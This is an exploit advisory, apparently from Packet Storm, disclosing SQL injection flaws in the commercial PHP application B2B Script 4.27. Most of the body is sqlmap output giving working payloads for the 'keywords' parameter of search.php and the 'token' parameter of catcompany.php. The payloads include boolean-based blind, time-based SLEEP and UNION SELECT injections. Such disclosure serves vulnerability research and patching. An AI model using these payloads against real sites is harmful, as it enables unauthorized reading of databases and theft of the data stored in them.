B2B Script 4.27 SQL Injection

2017-01-19T00:00:00
ID PACKETSTORM:140580
Type packetstorm
Reporter Dawid Morawski
Modified 2017-01-19T00:00:00

Description

                                        
                                            `# Vulnerability: B2B Script v4.27 - SQL Injection  
# Date: 18.01.2017  
# Software link: http://itechscripts.com/b2b-script/  
# Demo: http://b2b.itechscripts.com  
# Price: 199$  
# Category: webapps  
# Exploit Author: Dawid Morawski  
# Website: http://www.morawskiweb.pl  
# Contact: dawidmorawski1990@gmail.com  
#######################################  
  
1. Description  
An attacker can exploit this vulnerability to read from the database.  
  
2. SQL Injection / Proof of Concept:  
  
http://localhost/[PATH]/search.php?keywords=[SQL]  
SQLmap outout:  
  
Parameter: keywords (GET)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)  
Payload: keywords=-7908') OR 3641=3641#  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 2 columns  
Payload: keywords=Products') UNION ALL SELECT  
NULL,CONCAT(0x716b7a7871,0x68634473486965586e6b57754358736b487a43564c6963646e556549454e476177776a5a6a7a4c4c,0x71767a7a71)#  
---  
[INFO] testing MySQL  
[INFO] confirming MySQL  
[INFO] the back-end DBMS is MySQL  
  
#########################################  
  
http://localhost/[PATH]/catcompany.php?token=[SQL]  
SQLmap outout:  
  
Parameter: token (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: token=7532a5bfc9e07964f8dddeb95fc584cd965d' AND 9125=9125 AND  
'HhOm'='HhOm  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind  
Payload: token=7532a5bfc9e07964f8dddeb95fc584cd965d' AND SLEEP(5) AND  
'dWKJ'='dWKJ  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 6 columns  
Payload: token=-7417' UNION ALL SELECT  
NULL,CONCAT(0x7171707071,0x6a6c6d484f58726e48446167417a66756464445941464844416856527a634a704f4b79647a494654,0x716b786271),NULL,NULL,NULL,NULL--  
aNXq  
  
`